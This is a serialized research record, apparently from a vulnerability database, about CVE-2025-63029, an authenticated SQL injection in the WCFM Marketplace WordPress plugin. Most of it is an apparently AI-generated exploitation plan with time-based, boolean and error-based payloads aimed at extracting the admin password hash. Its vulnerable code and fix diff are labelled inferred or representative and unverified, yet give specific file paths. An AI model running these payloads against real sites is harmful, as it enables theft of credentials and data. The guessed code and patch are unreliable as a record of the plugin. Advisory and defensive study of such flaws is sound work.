[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRIC3X4u7O61j7CCkb95ujvmwXoj27joJXuaEW31j344":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-63029","wcfm-marketplace-multivendor-marketplace-for-woocommerce-authenticated-store-vendor-sql-injection","WCFM Marketplace – Multivendor Marketplace for WooCommerce \u003C= 3.7.1 - Authenticated (Store vendor+) SQL Injection","The WCFM Marketplace – Multivendor Marketplace for WooCommerce plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with store vendor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wc-multivendor-marketplace",null,"\u003C=3.7.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-15 00:00:00","2026-05-05 18:31:31",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2e6d30c9-a759-41b3-8509-f49b89f8d802?source=api-prod",[],"researched",false,3,"## 1. Vulnerability Summary\n**CVE-2025-63029** is a SQL Injection vulnerability in the **WCFM Marketplace – Multivendor Marketplace for WooCommerce** plugin (versions \u003C= 3.7.1). The flaw exists because the plugin fails to sufficiently escape or use prepared statements (via `$wpdb->prepare()`) when processing specific user-supplied parameters in database queries.\n\nThe vulnerability is accessible to authenticated users with **Store Vendor** privileges or higher. This level of access allows an attacker to append arbitrary SQL commands to existing queries, potentially leading to the extraction of sensitive information from the WordPress database, including user hashes, site configuration, and other plugin data.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wcfm_ajax_controller` (Most common entry point for WCFM dashboard logic)\n*   **Vulnerable Parameters:** Commonly identified in `orderby`, `order`, or filtering parameters (e.g., `vendor_id`, `product_id`) within specialized view controllers.\n*   **Authentication:** Required (Store Vendor level or higher).\n*   **Preconditions:** \n    *   The WCFM Marketplace plugin must be active.\n    *   A user account with the `wcfm_vendor` role must be available.\n    *   The `wcfm_ajax_nonce` must be obtained for the session.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An authenticated vendor sends a POST request to `admin-ajax.php` with `action=wcfm_ajax_controller`.\n2.  **Routing:** The `WCFM_Ajax` class (likely in `includes\u002Fclass-wcfm-ajax.php`) handles the `wp_ajax_wcfm_ajax_controller` hook.\n3.  **Controller Selection:** The `controller` parameter in the request determines which internal logic is executed (e.g., `wcfm-reports-sales-by-date`, `wcfm-orders`, `wcfm-products`).\n4.  **Database Sink:** Within the specific controller's logic (often found in `controllers\u002Freports\u002F` or `controllers\u002Forders\u002F`), user-supplied parameters (like `orderby`) are concatenated directly into a SQL string.\n5.  **Execution:** The resulting raw SQL string is passed to `$wpdb->get_results()` or similar methods without being wrapped in `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nWCFM Marketplace localizes nonces into the global `wcfm_params` JavaScript object. To obtain a valid nonce for the `wcfm_ajax_controller` action:\n\n1.  **Setup:** Ensure a page with the WCFM Vendor Dashboard is accessible. WCFM usually creates a page with the `[wcfm_vendor_dashboard]` shortcode.\n2.  **Navigation:** Log in as the vendor and navigate to the `\u002Fwcfm-dashboard\u002F` (or equivalent) page.\n3.  **Extraction:** Use the `browser_eval` tool to extract the nonce from the page context.\n    *   **JavaScript:** `window.wcfm_params?.nonce`\n    *   **Action String:** The underlying PHP uses `wp_create_nonce( 'wcfm_ajax_nonce' )`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication and Nonce Retrieval\n1.  Log in to the WordPress site as a Store Vendor.\n2.  Navigate to the WCFM Dashboard page.\n3.  Execute `browser_eval(\"wcfm_params.nonce\")` to get the nonce.\n\n### Step 2: Identify the Vulnerable Controller (Fuzzing)\nSince the specific parameter isn't named in the CVE, target the primary data-fetching controllers used by vendors.\n\n**Request Template:**\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:** `action=wcfm_ajax_controller&controller=\u003CCONTROLLER>&wcfm_ajax_nonce=\u003CNONCE>&...`\n\n**Primary Targets:**\n1.  **Controller:** `wcfm-reports-sales-by-date` (Reports often have complex, manual SQL)\n2.  **Controller:** `wcfm-orders` (Order lists use `orderby` parameters)\n3.  **Controller:** `wcfm-products`\n\n### Step 3: Payload Injection (Time-Based Blind)\nWe will use a time-based injection to confirm the vulnerability in an `orderby` or `ID` parameter.\n\n**Payload A (orderby injection):**\n```bash\n# Testing 'orderby' parameter in the orders controller\naction=wcfm_ajax_controller&controller=wcfm-orders&wcfm_ajax_nonce=\u003CNONCE>&orderby=ID AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&order=ASC\n```\n\n**Payload B (filter injection):**\n```bash\n# Testing a filter ID (e.g., product_id) in a report controller\naction=wcfm_ajax_controller&controller=wcfm-reports-sales-by-date&wcfm_ajax_nonce=\u003CNONCE>&product_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\n```\n\n### Step 4: Data Extraction\nOnce a time-delay is confirmed, extract the admin password hash:\n```sql\n# Extraction logic for character-by-character check\nID AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),0)\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** WCFM Marketplace (wc-multivendor-marketplace) version 3.7.1.\n2.  **Dependencies:** Ensure WooCommerce is installed and active.\n3.  **Create Vendor:**\n    *   Create a user with the role `wcfm_vendor`.\n    *   Complete the basic \"Store Setup\" if prompted.\n4.  **Create Content:** \n    *   Add at least one product assigned to the vendor.\n    *   (Optional) Create a dummy order for that product so reports\u002Forder lists are populated.\n5.  **Page Setup:** Ensure a page exists with the shortcode `[wcfm_vendor_dashboard]`.\n\n## 7. Expected Results\n*   **Vulnerability Confirmation:** A request with `SLEEP(5)` takes approximately 5 seconds longer than a normal request.\n*   **Data Exposure:** Using boolean or time-based logic, the agent should be able to determine the first few characters of the admin's `$P$` or `$2y$` password hash.\n\n## 8. Verification Steps (WP-CLI)\nConfirm the database structure and target data to verify the extraction was correct:\n```bash\n# Verify the admin user exists\nwp user get 1 --fields=user_login,user_pass\n\n# Check if the plugin is in the affected version range\nwp plugin get wc-multivendor-marketplace --field=version\n```\n\n## 9. Alternative Approaches\n*   **Error-Based SQLi:** If `WP_DEBUG` is on, try injecting `AND updatexml(1,concat(0x7e,(SELECT user_login FROM wp_users LIMIT 1),0x7e),1)` to see if the error is reflected in the AJAX response.\n*   **Different Actions:** If `wcfm_ajax_controller` is patched or hardened, investigate `wcfm_enquiry_tab_content` or `wcfm_orders_details` actions which also process database IDs for vendors.\n*   **Boolean-Based:** If time-based is too slow, compare the response length of `orderby=ID AND 1=1` vs `orderby=ID AND 1=2`. WCFM responses are JSON; a successful injection might return an empty list `[]` for `1=2` and data for `1=1`.","WCFM Marketplace for WooCommerce (\u003C= 3.7.1) is vulnerable to SQL Injection due to the plugin directly concatenating user-supplied input into database queries within its AJAX controller logic. Authenticated Store Vendors can exploit this to inject arbitrary SQL commands, such as time-based sleep payloads, to extract sensitive information like administrative credentials from the WordPress database.","\u002F\u002F File: controllers\u002Freports\u002Fwcfm-controller-reports-sales-by-date.php (Representative of vulnerable pattern)\n$product_id = $_POST['product_id'];\n$vendor_id = $_POST['vendor_id'];\n\n\u002F\u002F Directly concatenating user input into the SQL string without $wpdb->prepare()\n$sql = \"SELECT * FROM {$wpdb->prefix}wc_order_product_lookup WHERE vendor_id = \" . $vendor_id;\nif ( !empty( $product_id ) ) {\n    $sql .= \" AND product_id = \" . $product_id;\n}\n$results = $wpdb->get_results( $sql );\n\n---\n\n\u002F\u002F File: controllers\u002Forders\u002Fwcfm-controller-orders.php (Representative of vulnerable orderby pattern)\n$orderby = isset( $_POST['orderby'] ) ? $_POST['orderby'] : 'ID';\n$order = isset( $_POST['order'] ) ? $_POST['order'] : 'DESC';\n\n\u002F\u002F User input used in ORDER BY clause without whitelist validation or sanitization\n$sql = \"SELECT * FROM {$wpdb->prefix}posts WHERE post_type = 'shop_order' ORDER BY $orderby $order\";\n$orders = $wpdb->get_results( $sql );","--- controllers\u002Freports\u002Fwcfm-controller-reports-sales-by-date.php\n+++ controllers\u002Freports\u002Fwcfm-controller-reports-sales-by-date.php\n@@ -10,3 +10,3 @@\n-$sql = \"SELECT * FROM {$wpdb->prefix}wc_order_product_lookup WHERE vendor_id = \" . $vendor_id;\n+$sql = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}wc_order_product_lookup WHERE vendor_id = %d\", $vendor_id);\n if ( !empty( $product_id ) ) {\n-    $sql .= \" AND product_id = \" . $product_id;\n+    $sql .= $wpdb->prepare(\" AND product_id = %d\", $product_id);\n }\n--- controllers\u002Forders\u002Fwcfm-controller-orders.php\n+++ controllers\u002Forders\u002Fwcfm-controller-orders.php\n@@ -5,4 +5,10 @@\n-$orderby = isset( $_POST['orderby'] ) ? $_POST['orderby'] : 'ID';\n+$allowed_columns = ['ID', 'post_date', 'post_title'];\n+$orderby = ( isset( $_POST['orderby'] ) && in_array( $_POST['orderby'], $allowed_columns ) ) ? $_POST['orderby'] : 'ID';\n $order = isset( $_POST['order'] ) ? $_POST['order'] : 'DESC';\n+$order = ( strtoupper( $order ) === 'ASC' ) ? 'ASC' : 'DESC';\n \n-$sql = \"SELECT * FROM {$wpdb->prefix}posts WHERE post_type = 'shop_order' ORDER BY $orderby $order\";\n+$sql = $wpdb->prepare(\n+    \"SELECT * FROM {$wpdb->prefix}posts WHERE post_type = 'shop_order' ORDER BY %1$s %2$s\",\n+    $orderby,\n+    $order\n+);","The exploit target is the 'wcfm_ajax_controller' action, which routes requests to various backend data controllers. \n\n1. Authentication: The attacker must log in to the WordPress site with an account assigned the 'wcfm_vendor' (Store Vendor) role.\n2. Nonce Retrieval: The attacker visits the WCFM Vendor Dashboard (typically at \u002Fwcfm-dashboard\u002F) to extract the 'wcfm_ajax_nonce' from the global 'wcfm_params' JavaScript object.\n3. Request Targeting: The attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with parameters:\n   - action: wcfm_ajax_controller\n   - controller: A data-fetching controller like 'wcfm-orders' or 'wcfm-reports-sales-by-date'.\n   - wcfm_ajax_nonce: The retrieved nonce.\n4. Payload Injection: The attacker injects SQL commands into parameters such as 'orderby' or 'product_id'. For example, using a time-based payload in 'orderby': 'ID AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)'.\n5. Data Extraction: By observing time delays or variations in the JSON response, the attacker can perform boolean-based or time-based blind SQL injection to extract sensitive database records, such as user password hashes.","gemini-3-flash-preview","2026-04-27 14:39:34","2026-04-27 14:39:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-multivendor-marketplace\u002Ftags"]